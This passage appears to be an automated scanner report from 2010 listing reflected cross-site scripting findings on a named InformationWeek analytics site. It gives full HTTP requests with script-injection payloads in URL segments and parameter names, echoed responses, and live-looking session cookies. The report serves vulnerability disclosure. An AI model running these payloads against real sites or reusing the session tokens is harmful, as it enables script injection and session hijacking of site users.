The value of REST URL parameter 2 is copied into an HTML comment. The payload 82301--><script>alert(1)</script>ba02e432406 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2182301--><script>alert(1)</script>ba02e432406/Security/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... informationweek.com%2Fmenu%2F2182301--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eba02e432406%2FSecurity%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2182301--><script>alert(1)</script>ba02e432406/Security/Security.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e5e4--><script>alert(1)</script>5b8f09d378b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security9e5e4--><script>alert(1)</script>5b8f09d378b/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:20 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... onweek.com%2Fmenu%2F21%2FSecurity9e5e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5b8f09d378b%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security9e5e4--><script>alert(1)</script>5b8f09d378b/Security.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 10b99--><script>alert(1)</script>56e6ba882ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security/Security.html10b99--><script>alert(1)</script>56e6ba882ec HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:37 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:37 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... enu%2F21%2FSecurity%2FSecurity.html10b99--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E56e6ba882ec&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security/Security.html10b99--><script>alert(1)</script>56e6ba882ec"> ...[SNIP]...
3.105. http://analytics.informationweek.com/menu/21/Security/Security.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/21/Security/Security.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c6fae--><script>alert(1)</script>d4745af9c41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security/Security.html?c6fae--><script>alert(1)</script>d4745af9c41=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2FSecurity%2FSecurity.html%3Fc6fae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed4745af9c41%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security/Security.html?c6fae--><script>alert(1)</script>d4745af9c41=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8aad2--><script>alert(1)</script>45247f00081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu8aad2--><script>alert(1)</script>45247f00081/22/Soa-and-app-architecture/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:56 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... u8aad2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E45247f00081%2F22%2FSoa-and-app-architecture%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu8aad2--><script>alert(1)</script>45247f00081/22/Soa-and-app-architecture/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 99435--><script>alert(1)</script>0f6f3fb8104 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2299435--><script>alert(1)</script>0f6f3fb8104/Soa-and-app-architecture/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F2299435--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f6f3fb8104%2FSoa-and-app-architecture%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2299435--><script>alert(1)</script>0f6f3fb8104/Soa-and-app-architecture/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 93610--><script>alert(1)</script>76b52b37fa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture93610--><script>alert(1)</script>76b52b37fa6/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:17 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture93610--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E76b52b37fa6%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture93610--><script>alert(1)</script>76b52b37fa6/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55348--><script>alert(1)</script>023ecbbaa4d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture/Soa-app-architecture.html55348--><script>alert(1)</script>023ecbbaa4d HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:30 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html55348--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E023ecbbaa4d&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html55348--><script>alert(1)</script>023ecbbaa4d"> ...[SNIP]...
3.110. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87ec5--><script>alert(1)</script>6e8f57c142d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture/Soa-app-architecture.html?87ec5--><script>alert(1)</script>6e8f57c142d=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F87ec5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e8f57c142d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html?87ec5--><script>alert(1)</script>6e8f57c142d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 725f3--><script>alert(1)</script>e4018ea580b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu725f3--><script>alert(1)</script>e4018ea580b/24/Storage-and-servers/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... k.com%2Fmenu725f3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee4018ea580b%2F24%2FStorage-and-servers%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu725f3--><script>alert(1)</script>e4018ea580b/24/Storage-and-servers/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 95f54--><script>alert(1)</script>3e80f4846d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2495f54--><script>alert(1)</script>3e80f4846d9/Storage-and-servers/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:28 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:28 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F2495f54--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e80f4846d9%2FStorage-and-servers%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2495f54--><script>alert(1)</script>3e80f4846d9/Storage-and-servers/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e57fc--><script>alert(1)</script>04da1a3ad92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-serverse57fc--><script>alert(1)</script>04da1a3ad92/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:39 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:39 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rage-and-serverse57fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E04da1a3ad92%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-serverse57fc--><script>alert(1)</script>04da1a3ad92/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 90bb4--><script>alert(1)</script>ed69291834a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-servers/Storage-server.html90bb4--><script>alert(1)</script>ed69291834a HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:48 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... torage-server.html90bb4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eed69291834a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html90bb4--><script>alert(1)</script>ed69291834a"> ...[SNIP]...
3.115. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/24/Storage-and-servers/Storage-server.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 37313--><script>alert(1)</script>18e562ca190 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-servers/Storage-server.html?37313--><script>alert(1)</script>18e562ca190=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... erver.html%3F37313--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18e562ca190%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html?37313--><script>alert(1)</script>18e562ca190=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 86fdb--><script>alert(1)</script>525303269e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
